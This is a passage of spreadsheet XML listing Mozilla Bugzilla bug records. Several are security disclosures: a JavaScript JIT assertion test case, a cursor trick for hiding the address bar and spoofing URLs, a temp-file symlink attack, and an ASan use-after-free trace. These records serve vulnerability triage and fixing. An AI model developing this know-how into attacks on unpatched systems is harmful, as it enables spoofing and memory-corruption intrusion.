          <t>string crash found while fuzzing WebGL shaders</t>
        </is>
      </c>
      <c r="D5341" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:03 -0700</t>
        </is>
      </c>
      <c r="E5341" t="n">
        <v>1</v>
      </c>
      <c r="F5341" t="n">
        <v>1</v>
      </c>
      <c r="G5341" t="n">
        <v>3</v>
      </c>
      <c r="H5341" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5341" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5341" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K5341" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L5341" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5341" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5341" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5341" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5341" t="inlineStr">
        <is>
          <t>[sg:critical?] [waiting on approved fixes to land on 6 and 7][qa?]</t>
        </is>
      </c>
      <c r="Q5341" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5341" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5341" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T5341" t="n">
        <v>1</v>
      </c>
      <c r="U5341" t="n">
        <v>0</v>
      </c>
      <c r="V5341" t="n">
        <v>41</v>
      </c>
      <c r="W5341" t="inlineStr">
        <is>
          <t>Created attachment 540783
PoC zipped
Michael Jordon of Context IS submitted this Javascript string crash he found while testing WebGL in Firefox 4.0.1 on WinXP. He cannot reproduce the bug in a nightly build, but doesn't know if that means we've fixed it or the crash is just moved a bit. From Michael:
This, might be related to WebGL but I don't think it actually is. It was just exposed when doing fuzzing against the shader compiler. It isn't clear if this has a security implication, although it looks possibly like some memory is getting overwritten causing the issues to occur.  
The bug seems to manifest in two different ways, both of them when calling into nsPromiseFlatString::nsPromiseFlatString. The first manifestation ends up with a call to memcpy where the source pointer is too small for the number of bytes it is supposed to be copying so crashes on a read AV. This is string crash 1. The second is a stack overflow, where the code calls into the function xul!nsAString_internal::Assign which seems to think it can optimise the string operation by calling back into itself, which causes an infinite loop and eventually the stack runs out. This is string crash 2. Which one occurs seems to depend on what has already been loaded at the time.
The PoC minimal_crash.html exhibits the bug on 4.0.1 on XP SP3. It doesn't seem to crash the latest nightly build, however slight changes to the Javascript (which doesn't change function, just form) seems to also stop the crash so it might just be the nightly build is rebuilt in such a way that memory layout is sufficiently different to stop the underlying bug, or it could be fixed.</t>
        </is>
      </c>
      <c r="X5341" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5342">
      <c r="A5342" t="n">
        <v>281424</v>
      </c>
      <c r="B5342" t="inlineStr">
        <is>
          <t>2005-02-07 13:45:14 -0800</t>
        </is>
      </c>
      <c r="C5342" t="inlineStr">
        <is>
          <t>[FIX]Crash in nsIView::GetOffsetTo [@ nsIView::GetOffsetTo 3412f9d4]</t>
        </is>
      </c>
      <c r="D5342" t="inlineStr">
        <is>
          <t>2018-08-29 15:24:07 -0700</t>
        </is>
      </c>
      <c r="E5342" t="n">
        <v>1</v>
      </c>
      <c r="F5342" t="n">
        <v>1</v>
      </c>
      <c r="G5342" t="n">
        <v>3</v>
      </c>
      <c r="H5342" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5342" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5342" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K5342" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5342" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5342" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5342" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5342" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5342" t="inlineStr"/>
      <c r="Q5342" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5342" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5342" t="inlineStr">
        <is>
          <t>mozilla1.8beta1</t>
        </is>
      </c>
      <c r="T5342" t="n">
        <v>1</v>
      </c>
      <c r="U5342" t="n">
        <v>0</v>
      </c>
      <c r="V5342" t="n">
        <v>21</v>
      </c>
      <c r="W5342" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b) Gecko/20050207 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b) Gecko/20050207 Firefox/1.0+
In the FoxyTunes extension (http://www.foxytunes.org) there is a button (the
button with a musical note) which when hovered over displays a popup.
In the latest Firefox nightlies this causes a crash. 
The crash can be easily reproduced if you hover over the button several times.
Reproducible: Always
Steps to Reproduce:
1. Install FoxyTunes 1.1 from http://www.foxytunes.org
2. Hover over the 'info' button for a few times
Actual Results:  
Browser crash</t>
        </is>
      </c>
      <c r="X5342" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5343">
      <c r="A5343" t="n">
        <v>1795815</v>
      </c>
      <c r="B5343" t="inlineStr">
        <is>
          <t>2022-10-17 19:53:22 -0700</t>
        </is>
      </c>
      <c r="C5343" t="inlineStr">
        <is>
          <t>Css Draw Mouse Cursor to hide omni box</t>
        </is>
      </c>
      <c r="D5343" t="inlineStr">
        <is>
          <t>2024-05-30 11:01:42 -0700</t>
        </is>
      </c>
      <c r="E5343" t="n">
        <v>1</v>
      </c>
      <c r="F5343" t="n">
        <v>1</v>
      </c>
      <c r="G5343" t="n">
        <v>3</v>
      </c>
      <c r="H5343" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5343" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5343" t="inlineStr">
        <is>
          <t>DOM: CSS Object Model</t>
        </is>
      </c>
      <c r="K5343" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5343" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5343" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5343" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5343" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5343" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q5343" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5343" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5343" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T5343" t="n">
        <v>1</v>
      </c>
      <c r="U5343" t="n">
        <v>0</v>
      </c>
      <c r="V5343" t="n">
        <v>22</v>
      </c>
      <c r="W5343" t="inlineStr">
        <is>
          <t>Created attachment 9298956
abusive3.html
when the mouse drawing cursor at 128x128 is not inside the iframe, the cursor cannot exit the web content area. but when inside an iframe , it should be able to bust out of the web content area and can hide omnibox. maybe it could be more useful to an attacker if the cursor image was a spoofed URL
1. open abusive.html
2. move cursor to hide omnibox 
i attached the POC video and html file</t>
        </is>
      </c>
      <c r="X5343" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5344">
      <c r="A5344" t="n">
        <v>1384898</v>
      </c>
      <c r="B5344" t="inlineStr">
        <is>
          <t>2017-07-27 04:51:47 -0700</t>
        </is>
      </c>
      <c r="C5344" t="inlineStr">
        <is>
          <t>Don't bother setting default fill colors for the downloads indicator</t>
        </is>
      </c>
      <c r="D5344" t="inlineStr">
        <is>
          <t>2017-07-28 06:33:22 -0700</t>
        </is>
      </c>
      <c r="E5344" t="n">
        <v>1</v>
      </c>
      <c r="F5344" t="n">
        <v>1</v>
      </c>
      <c r="G5344" t="n">
        <v>2</v>
      </c>
      <c r="H5344" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5344" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5344" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K5344" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5344" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5344" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5344" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5344" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5344" t="inlineStr">
        <is>
          <t>[photon-visual]</t>
        </is>
      </c>
      <c r="Q5344" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5344" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5344" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T5344" t="n">
        <v>1</v>
      </c>
      <c r="U5344" t="n">
        <v>0</v>
      </c>
      <c r="V5344" t="n">
        <v>8</v>
      </c>
      <c r="W5344" t="inlineStr">
        <is>
          <t>toolbarbutton-icons.inc.css takes care of this.</t>
        </is>
      </c>
      <c r="X5344" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5345">
      <c r="A5345" t="n">
        <v>714897</v>
      </c>
      <c r="B5345" t="inlineStr">
        <is>
          <t>2012-01-03 11:49:28 -0800</t>
        </is>
      </c>
      <c r="C5345" t="inlineStr">
        <is>
          <t>Bugzilla may not be sending notices to infra-dbnotices about new field permissions</t>
        </is>
      </c>
      <c r="D5345" t="inlineStr">
        <is>
          <t>2012-01-04 07:05:01 -0800</t>
        </is>
      </c>
      <c r="E5345" t="n">
        <v>1</v>
      </c>
      <c r="F5345" t="n">
        <v>1</v>
      </c>
      <c r="G5345" t="n">
        <v>7</v>
      </c>
      <c r="H5345" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5345" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J5345" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K5345" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L5345" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5345" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5345" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5345" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5345" t="inlineStr"/>
      <c r="Q5345" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5345" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5345" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5345" t="n">
        <v>1</v>
      </c>
      <c r="U5345" t="n">
        <v>0</v>
      </c>
      <c r="V5345" t="n">
        <v>8</v>
      </c>
      <c r="W5345" t="inlineStr">
        <is>
          <t>Following up after https://bugzilla.mozilla.org/show_bug.cgi?id=677061 -- according to justdave in IM:
justdave: sheeri: the bugzilla software does it from the admin ui
[7:25pm] justdave: it's supposed to send an email to infradb-notices with the SQL to run to add the perms for metrics
However, there were several issues as per the bug, so I want to make sure that the e-mails are actually going to infradb-notices.</t>
        </is>
      </c>
      <c r="X5345" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5346">
      <c r="A5346" t="n">
        <v>950438</v>
      </c>
      <c r="B5346" t="inlineStr">
        <is>
          <t>2013-12-14 23:37:29 -0800</t>
        </is>
      </c>
      <c r="C5346" t="inlineStr">
        <is>
          <t>Assertion failure: Double input should be equal or higher than Lowerbound., at jit/IonMacroAssembler.cpp</t>
        </is>
      </c>
      <c r="D5346" t="inlineStr">
        <is>
          <t>2015-02-25 20:46:34 -0800</t>
        </is>
      </c>
      <c r="E5346" t="n">
        <v>1</v>
      </c>
      <c r="F5346" t="n">
        <v>1</v>
      </c>
      <c r="G5346" t="n">
        <v>3</v>
      </c>
      <c r="H5346" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5346" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5346" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K5346" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5346" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5346" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5346" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5346" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5346" t="inlineStr">
        <is>
          <t>[adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q5346" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5346" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5346" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T5346" t="n">
        <v>1</v>
      </c>
      <c r="U5346" t="n">
        <v>0</v>
      </c>
      <c r="V5346" t="n">
        <v>29</v>
      </c>
      <c r="W5346" t="inlineStr">
        <is>
          <t>Created attachment 8347709
lldb stack
gcslice(5);
function f(y) {
    return (-8 &lt; (Math.abs(Math.tan())) ? y : y)
}
f(0);
f(0);
asserts js debug shell on m-c changeset c049cb230d77 with --ion-eager --ion-check-range-analysis at Assertion failure: Double input should be equal or higher than Lowerbound., at jit/IonMacroAssembler.cpp
s-s because range analysis bugs can sometimes be s-s, so locking pending analysis.
My configure flags are:
CC="clang -Qunused-arguments" AR=ar CXX="clang++ -Qunused-arguments" sh ./configure --target=x86_64-apple-darwin12.5.0 --enable-optimize --enable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --enable-methodjit --enable-type-inference --disable-tests --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
=== Tinderbox Build Bisection Results ===
Last "good" changeset has timestamp "20131209104147" and the hash "a79294ed7ebe"
First "bad" changeset has timestamp "20131209134603" and the hash "de6ebd46e7d0"
Likely regression window: http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=a79294ed7ebe&amp;tochange=de6ebd46e7d0
Guessing related to bug 943303, so setting needinfo? from :sunfish.</t>
        </is>
      </c>
      <c r="X5346" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5347">
      <c r="A5347" t="n">
        <v>305353</v>
      </c>
      <c r="B5347" t="inlineStr">
        <is>
          <t>2005-08-20 14:31:49 -0700</t>
        </is>
      </c>
      <c r="C5347" t="inlineStr">
        <is>
          <t>[SECURITY] Insecure temporary filename handling in syncshadowdb</t>
        </is>
      </c>
      <c r="D5347" t="inlineStr">
        <is>
          <t>2006-01-03 01:19:13 -0800</t>
        </is>
      </c>
      <c r="E5347" t="n">
        <v>1</v>
      </c>
      <c r="F5347" t="n">
        <v>1</v>
      </c>
      <c r="G5347" t="n">
        <v>4</v>
      </c>
      <c r="H5347" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5347" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5347" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K5347" t="inlineStr">
        <is>
          <t>2.16.10</t>
        </is>
      </c>
      <c r="L5347" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5347" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5347" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5347" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5347" t="inlineStr">
        <is>
          <t>[fixed in 2.16.11] [does not affect 2.18/2.20/trunk]</t>
        </is>
      </c>
      <c r="Q5347" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5347" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5347" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5347" t="n">
        <v>1</v>
      </c>
      <c r="U5347" t="n">
        <v>0</v>
      </c>
      <c r="V5347" t="n">
        <v>18</v>
      </c>
      <c r="W5347" t="inlineStr">
        <is>
          <t>From: Javier Fernández-Sanguino Peña &lt;jfs@computer.org&gt;
Date: Sat, 6 Aug 2005 11:05:50 +0200
To: Alexis Sukrieh &lt;sukria@sukria.net&gt;, RACmi Perrot &lt;rperrot@debian.org&gt;,
	team@security.debian.org
Subject: Bugzilla: Unsafe use of temporary files in the syncshadow script
User-Agent: Mutt/1.5.9i
[ Note: this is a different bug from the one I reported in the BTS
  since it affects the stable / oldstable release and not the testing /
  unstable branches ]
Hi there,
Bugzilla (bugzilla_2.14.2-0woody4 and bugzilla_2.16.7-7sarge1) contains
a script which is used to synchronise the bugzilla user database with
the shadow password database called syncshadowdb. This script is intented
to be run by the Bug Tracking System.
The script uses temporary files in an unsafe way since it selects a
name for the file based on PID and does not make any effort to determine
if the file exists and if it is a symlink. A local user could use this
to direct symlink attacks and overwrite files that the Bug Tracking System
has access to.
The attached (untested) patch, which uses File::Temp should fix this issue
and prevent any symlink attacks.
Regards
Javier</t>
        </is>
      </c>
      <c r="X5347" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5348">
      <c r="A5348" t="n">
        <v>933311</v>
      </c>
      <c r="B5348" t="inlineStr">
        <is>
          <t>2013-10-31 09:19:56 -0700</t>
        </is>
      </c>
      <c r="C5348" t="inlineStr">
        <is>
          <t>Add a /humans.txt url to bedrock</t>
        </is>
      </c>
      <c r="D5348" t="inlineStr">
        <is>
          <t>2014-02-19 10:57:44 -0800</t>
        </is>
      </c>
      <c r="E5348" t="n">
        <v>1</v>
      </c>
      <c r="F5348" t="n">
        <v>1</v>
      </c>
      <c r="G5348" t="n">
        <v>5</v>
      </c>
      <c r="H5348" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5348" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J5348" t="inlineStr">
        <is>
          <t>Bedrock</t>
        </is>
      </c>
      <c r="K5348" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5348" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5348" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5348" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5348" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5348" t="inlineStr">
        <is>
          <t>[kb=1206856] [mentor=pmac@mozilla.com]</t>
        </is>
      </c>
      <c r="Q5348" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5348" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5348" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5348" t="n">
        <v>1</v>
      </c>
      <c r="U5348" t="n">
        <v>0</v>
      </c>
      <c r="V5348" t="n">
        <v>18</v>
      </c>
      <c r="W5348" t="inlineStr">
        <is>
          <t>This will be a text file that will list contributors to the project as taken from Github, as well as l10n contributors from SVN. For mozorg it'd be nice to get the list from the mozilla.com and mozilla.org repos in SVN as well, but that may be too much.
This can be based on the implementation in Kuma:
https://github.com/mozilla/kuma/tree/master/apps/humans
This work was originally done by github user @buddylindsey.
There is talk of making this a generic django app. If that starts it will block this bug.</t>
        </is>
      </c>
      <c r="X5348" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5349">
      <c r="A5349" t="n">
        <v>1736243</v>
      </c>
      <c r="B5349" t="inlineStr">
        <is>
          <t>2021-10-17 12:04:48 -0700</t>
        </is>
      </c>
      <c r="C5349" t="inlineStr">
        <is>
          <t>heap-use-after-free [@ mozilla::SVGRenderingObserver::OnNonDOMMutationRenderingChange]</t>
        </is>
      </c>
      <c r="D5349" t="inlineStr">
        <is>
          <t>2022-08-27 22:30:59 -0700</t>
        </is>
      </c>
      <c r="E5349" t="n">
        <v>1</v>
      </c>
      <c r="F5349" t="n">
        <v>1</v>
      </c>
      <c r="G5349" t="n">
        <v>3</v>
      </c>
      <c r="H5349" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5349" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5349" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5349" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5349" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5349" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5349" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5349" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5349" t="inlineStr">
        <is>
          <t>[adv-main98+r][sec-survey][adv-esr91.7+r]</t>
        </is>
      </c>
      <c r="Q5349" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5349" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5349" t="inlineStr">
        <is>
          <t>99 Branch</t>
        </is>
      </c>
      <c r="T5349" t="n">
        <v>1</v>
      </c>
      <c r="U5349" t="n">
        <v>0</v>
      </c>
      <c r="V5349" t="n">
        <v>45</v>
      </c>
      <c r="W5349" t="inlineStr">
        <is>
          <t>Created attachment 9246332
testcase.html
Found while fuzzing m-c 20211017-650d84a601ba (--enable-address-sanitizer  --enable-fuzzing)
This might be a duplicate of bug 1415551. The test case appears to only reproduce the issue on Windows and it is fairly reliable.
```
==9852==ERROR: AddressSanitizer: heap-use-after-free on address 0x11e0b8ee8f08 at pc 0x7ffa37b57ec1 bp 0x007b693f2b40 sp 0x007b693f2b88
WRITE of size 1 at 0x11e0b8ee8f08 thread T0
    #0 0x7ffa37b57ec0 in mozilla::SVGRenderingObserver::OnNonDOMMutationRenderingChange /builds/worker/checkouts/gecko/layout/svg/SVGObserverUtils.cpp:246
    #1 0x7ffa37b57ec0 in mozilla::SVGRenderingObserverSet::InvalidateAll(void) /builds/worker/checkouts/gecko/layout/svg/SVGObserverUtils.cpp:1065
    #2 0x7ffa37b5271c in mozilla::SVGTextFrame::ReflowSVGNonDisplayText(void) /builds/worker/checkouts/gecko/layout/svg/SVGTextFrame.cpp:2844
    #3 0x7ffa37b05ae0 in mozilla::SVGContainerFrame::ReflowSVGNonDisplayText(class nsIFrame *) /builds/worker/checkouts/gecko/layout/svg/SVGContainerFrame.cpp:114
    #4 0x7ffa37b05b70 in mozilla::SVGContainerFrame::ReflowSVGNonDisplayText(class nsIFrame *) /builds/worker/checkouts/gecko/layout/svg/SVGContainerFrame.cpp:119
    #5 0x7ffa37b638e7 in mozilla::SVGOuterSVGFrame::Reflow(class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, class nsReflowStatus &amp;) /builds/worker/checkouts/gecko/layout/svg/SVGOuterSVGFrame.cpp:456
    #6 0x7ffa378e055a in nsLineLayout::ReflowFrame(class nsIFrame *, class nsReflowStatus &amp;, class mozilla::ReflowOutput *, bool &amp;) /builds/worker/checkouts/gecko/layout/generic/nsLineLayout.cpp:875
    #7 0x7ffa37639487 in nsBlockFrame::ReflowInlineFrame(class mozilla::BlockReflowInput &amp;, class nsLineLayout &amp;, class nsLineList_iterator, class nsIFrame *, enum LineReflowStatus *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4565
    #8 0x7ffa37637d42 in nsBlockFrame::DoReflowInlineFrames(class mozilla::BlockReflowInput &amp;, class nsLineLayout &amp;, class nsLineList_iterator, struct nsFlowAreaRect &amp;, int &amp;, struct nsFloatManager::SavedState *, bool *, enum LineReflowStatus *, bool) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4367
    #9 0x7ffa376301ff in nsBlockFrame::ReflowInlineFrames(class mozilla::BlockReflowInput &amp;, class nsLineList_iterator, bool *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:4252
    #10 0x7ffa37628509 in nsBlockFrame::ReflowLine(class mozilla::BlockReflowInput &amp;, class nsLineList_iterator, bool *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:3229
    #11 0x7ffa3761b904 in nsBlockFrame::ReflowDirtyLines(class mozilla::BlockReflowInput &amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:2763
    #12 0x7ffa37611a8d in nsBlockFrame::Reflow(class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, class nsReflowStatus &amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:1394
    #13 0x7ffa37635988 in nsBlockReflowContext::ReflowBlock(class mozilla::LogicalRect const &amp;, bool, struct nsCollapsingMargin &amp;, int, bool, class nsLineBox *, struct mozilla::ReflowInput &amp;, class nsReflowStatus &amp;, class mozilla::BlockReflowInput &amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockReflowContext.cpp:288
    #14 0x7ffa3762b68d in nsBlockFrame::ReflowBlockFrame(class mozilla::BlockReflowInput &amp;, class nsLineList_iterator, bool *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:3886
    #15 0x7ffa376286b9 in nsBlockFrame::ReflowLine(class mozilla::BlockReflowInput &amp;, class nsLineList_iterator, bool *) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:3226
    #16 0x7ffa3761b904 in nsBlockFrame::ReflowDirtyLines(class mozilla::BlockReflowInput &amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:2763
    #17 0x7ffa37611a8d in nsBlockFrame::Reflow(class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, class nsReflowStatus &amp;) /builds/worker/checkouts/gecko/layout/generic/nsBlockFrame.cpp:1394
    #18 0x7ffa37661cac in nsContainerFrame::ReflowChild(class nsIFrame *, class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, class mozilla::WritingMode const &amp;, class mozilla::LogicalPoint const &amp;, struct nsSize const &amp;, enum nsIFrame::ReflowChildFlags, class nsReflowStatus &amp;, class nsOverflowContinuationTracker *) /builds/worker/checkouts/gecko/layout/generic/nsContainerFrame.cpp:1004
    #19 0x7ffa3765f639 in nsCanvasFrame::Reflow(class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, class nsReflowStatus &amp;) /builds/worker/checkouts/gecko/layout/generic/nsCanvasFrame.cpp:787
    #20 0x7ffa37661cac in nsContainerFrame::ReflowChild(class nsIFrame *, class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, class mozilla::WritingMode const &amp;, class mozilla::LogicalPoint const &amp;, struct nsSize const &amp;, enum nsIFrame::ReflowChildFlags, class nsReflowStatus &amp;, class nsOverflowContinuationTracker *) /builds/worker/checkouts/gecko/layout/generic/nsContainerFrame.cpp:1004
    #21 0x7ffa3771fb72 in nsHTMLScrollFrame::ReflowScrolledFrame(struct mozilla::ScrollReflowInput *, bool, bool, class mozilla::ReflowOutput *) /builds/worker/checkouts/gecko/layout/generic/nsGfxScrollFrame.cpp:763
    #22 0x7ffa3772239a in nsHTMLScrollFrame::ReflowContents(struct mozilla::ScrollReflowInput *, class mozilla::ReflowOutput const &amp;) /builds/worker/checkouts/gecko/layout/generic/nsGfxScrollFrame.cpp:884
    #23 0x7ffa3772f399 in nsHTMLScrollFrame::Reflow(class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, class nsReflowStatus &amp;) /builds/worker/checkouts/gecko/layout/generic/nsGfxScrollFrame.cpp:1305
    #24 0x7ffa375f9b4e in nsContainerFrame::ReflowChild(class nsIFrame *, class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, int, int, enum nsIFrame::ReflowChildFlags, class nsReflowStatus &amp;, class nsOverflowContinuationTracker *) /builds/worker/checkouts/gecko/layout/generic/nsContainerFrame.cpp:1044
    #25 0x7ffa375f898a in mozilla::ViewportFrame::Reflow(class nsPresContext *, class mozilla::ReflowOutput &amp;, struct mozilla::ReflowInput const &amp;, class nsReflowStatus &amp;) /builds/worker/checkouts/gecko/layout/generic/ViewportFrame.cpp:374
    #26 0x7ffa373a70aa in mozilla::PresShell::DoReflow(class nsIFrame *, bool, class mozilla::OverflowChangedTracker *) /builds/worker/checkouts/gecko/layout/base/PresShell.cpp:9598
